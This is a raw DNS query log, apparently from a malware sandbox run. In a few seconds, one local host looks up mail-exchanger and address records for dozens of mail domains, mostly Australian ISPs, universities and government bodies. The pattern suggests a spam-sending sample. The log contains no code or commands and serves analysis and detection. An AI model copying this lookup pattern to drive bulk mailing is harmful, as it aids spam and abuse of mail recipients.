                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.124005079 CET8.8.8.8192.168.2.30x4c99No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.142575026 CET8.8.8.8192.168.2.30x3108No error (0)nbnco.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.142575026 CET8.8.8.8192.168.2.30x3108No error (0)nbnco.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.142575026 CET8.8.8.8192.168.2.30x3108No error (0)nbnco.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.142575026 CET8.8.8.8192.168.2.30x3108No error (0)nbnco.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.173620939 CET8.8.8.8192.168.2.30xf7d4No error (0)act.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.199666023 CET8.8.8.8192.168.2.30x5289No error (0)mail1.employment.gov.au165.12.244.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.201338053 CET8.8.8.8192.168.2.30x2a95No error (0)act-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.201338053 CET8.8.8.8192.168.2.30x2a95No error (0)act-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.202070951 CET8.8.8.8192.168.2.30x1377No error (0)smtp2a-1.nbnco.net.au49.0.10.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.273263931 CET8.8.8.8192.168.2.30x9b8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.273263931 CET8.8.8.8192.168.2.30x9b8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.273263931 CET8.8.8.8192.168.2.30x9b8eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.294352055 CET8.8.8.8192.168.2.30xf5bfNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.333957911 CET8.8.8.8192.168.2.30xb041No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.354830027 CET8.8.8.8192.168.2.30xa288No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.403435946 CET8.8.8.8192.168.2.30x8f9cName error (3)midland.autotrader.co.uknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.472801924 CET8.8.8.8192.168.2.30x2bedNo error (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.472801924 CET8.8.8.8192.168.2.30x2bedNo error (0)uq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.502417088 CET8.8.8.8192.168.2.30x3dbNo error (0)mx2.hc86-32.ap.iphmx.com139.138.31.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.502417088 CET8.8.8.8192.168.2.30x3dbNo error (0)mx2.hc86-32.ap.iphmx.com139.138.29.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.671691895 CET8.8.8.8192.168.2.30x6f78No error (0)uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.671691895 CET8.8.8.8192.168.2.30x6f78No error (0)uts.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.690546989 CET8.8.8.8192.168.2.30x7375No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.690546989 CET8.8.8.8192.168.2.30x7375No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.690546989 CET8.8.8.8192.168.2.30x7375No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.690546989 CET8.8.8.8192.168.2.30x7375No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.762022972 CET8.8.8.8192.168.2.30xf558No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.782099009 CET8.8.8.8192.168.2.30x1b4aNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.846716881 CET8.8.8.8192.168.2.30x2386No error (0)ihug.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.869498968 CET8.8.8.8192.168.2.30xd75fNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.870692015 CET8.8.8.8192.168.2.30xe202No error (0)three.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:44.888704062 CET8.8.8.8192.168.2.30xd071No error (0)smtpin2.three.com.au202.124.68.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.088449001 CET8.8.8.8192.168.2.30x584fNo error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.088449001 CET8.8.8.8192.168.2.30x584fNo error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.088449001 CET8.8.8.8192.168.2.30x584fNo error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.088449001 CET8.8.8.8192.168.2.30x584fNo error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.088449001 CET8.8.8.8192.168.2.30x584fNo error (0)education.nsw.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.115432978 CET8.8.8.8192.168.2.30x12f0No error (0)alt3.aspmx.l.google.com142.251.8.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.193181992 CET8.8.8.8192.168.2.30x93fdNo error (0)bekkers.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.193181992 CET8.8.8.8192.168.2.30x93fdNo error (0)bekkers.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.216762066 CET8.8.8.8192.168.2.30x44a4No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.216762066 CET8.8.8.8192.168.2.30x44a4No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.216762066 CET8.8.8.8192.168.2.30x44a4No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.222523928 CET8.8.8.8192.168.2.30x6f0No error (0)d173919b.ess.barracudanetworks.com209.222.82.255A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.222523928 CET8.8.8.8192.168.2.30x6f0No error (0)d173919b.ess.barracudanetworks.com209.222.82.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.222523928 CET8.8.8.8192.168.2.30x6f0No error (0)d173919b.ess.barracudanetworks.com209.222.82.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.248578072 CET8.8.8.8192.168.2.30x35No error (0)mx3.nameserver.net.au112.140.176.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.271009922 CET8.8.8.8192.168.2.30x5174No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.271009922 CET8.8.8.8192.168.2.30x5174No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.271009922 CET8.8.8.8192.168.2.30x5174No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.291218042 CET8.8.8.8192.168.2.30xaeaNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.319304943 CET8.8.8.8192.168.2.30x5beaNo error (0)amnet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.347233057 CET8.8.8.8192.168.2.30x7f0dNo error (0)mx1.amnet.net.au203.134.22.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.457037926 CET8.8.8.8192.168.2.30xc1d8No error (0)isis.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.457037926 CET8.8.8.8192.168.2.30xc1d8No error (0)isis.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.475413084 CET8.8.8.8192.168.2.30xaf6bNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.475413084 CET8.8.8.8192.168.2.30xaf6bNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.475413084 CET8.8.8.8192.168.2.30xaf6bNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.475413084 CET8.8.8.8192.168.2.30xaf6bNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.540319920 CET8.8.8.8192.168.2.30xb8dfNo error (0)northnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.547480106 CET8.8.8.8192.168.2.30xf028No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.559344053 CET8.8.8.8192.168.2.30xd388No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.642153025 CET8.8.8.8192.168.2.30xad26No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.758388042 CET8.8.8.8192.168.2.30x2792No error (0)newcastle.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.758388042 CET8.8.8.8192.168.2.30x2792No error (0)newcastle.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.777730942 CET8.8.8.8192.168.2.30xa24No error (0)au-smtp-inbound-1.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.777730942 CET8.8.8.8192.168.2.30xa24No error (0)au-smtp-inbound-1.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.777730942 CET8.8.8.8192.168.2.30xa24No error (0)au-smtp-inbound-1.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.777730942 CET8.8.8.8192.168.2.30xa24No error (0)au-smtp-inbound-1.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.845375061 CET8.8.8.8192.168.2.30xd5f8No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.845375061 CET8.8.8.8192.168.2.30xd5f8No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.885102987 CET8.8.8.8192.168.2.30x6656No error (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.885102987 CET8.8.8.8192.168.2.30x6656No error (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.885102987 CET8.8.8.8192.168.2.30x6656No error (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.885102987 CET8.8.8.8192.168.2.30x6656No error (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.885102987 CET8.8.8.8192.168.2.30x6656No error (0)winen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.889940977 CET8.8.8.8192.168.2.30x3de4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.889940977 CET8.8.8.8192.168.2.30x3de4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.889940977 CET8.8.8.8192.168.2.30x3de4No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.907862902 CET8.8.8.8192.168.2.30x6b36No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.916428089 CET8.8.8.8192.168.2.30x529No error (0)alt1.aspmx.l.google.com142.250.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.968842983 CET8.8.8.8192.168.2.30xfb9aNo error (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:45.993149042 CET8.8.8.8192.168.2.30x3c3No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.079569101 CET8.8.8.8192.168.2.30x6d91No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.079569101 CET8.8.8.8192.168.2.30x6d91No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.079569101 CET8.8.8.8192.168.2.30x6d91No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.097687960 CET8.8.8.8192.168.2.30xf9c7No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.139707088 CET8.8.8.8192.168.2.30xd730No error (0)bigblue.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.143193960 CET8.8.8.8192.168.2.30x905aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.143193960 CET8.8.8.8192.168.2.30x905aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.143193960 CET8.8.8.8192.168.2.30x905aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.160178900 CET8.8.8.8192.168.2.30x5decNo error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.163220882 CET8.8.8.8192.168.2.30xc736No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.203252077 CET8.8.8.8192.168.2.30x2f76No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.203252077 CET8.8.8.8192.168.2.30x2f76No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.203252077 CET8.8.8.8192.168.2.30x2f76No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.232944965 CET8.8.8.8192.168.2.30xaa10No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.282283068 CET8.8.8.8192.168.2.30x5e01No error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.282283068 CET8.8.8.8192.168.2.30x5e01No error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.314230919 CET8.8.8.8192.168.2.30xea77No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.314230919 CET8.8.8.8192.168.2.30xea77No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.332777977 CET8.8.8.8192.168.2.30x65a6No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.548271894 CET8.8.8.8192.168.2.30xcbe5No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.568840981 CET8.8.8.8192.168.2.30x9e37No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.569039106 CET8.8.8.8192.168.2.30x9c26No error (0)mail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.638089895 CET8.8.8.8192.168.2.30xde0eNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.656619072 CET8.8.8.8192.168.2.30x87b8No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.706984043 CET8.8.8.8192.168.2.30x177eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.706984043 CET8.8.8.8192.168.2.30x177eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.706984043 CET8.8.8.8192.168.2.30x177eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:46.715758085 CET8.8.8.8192.168.2.30xb422No error (0)zincmedia.com.auMX (Mail exchange)IN (0x0001)false
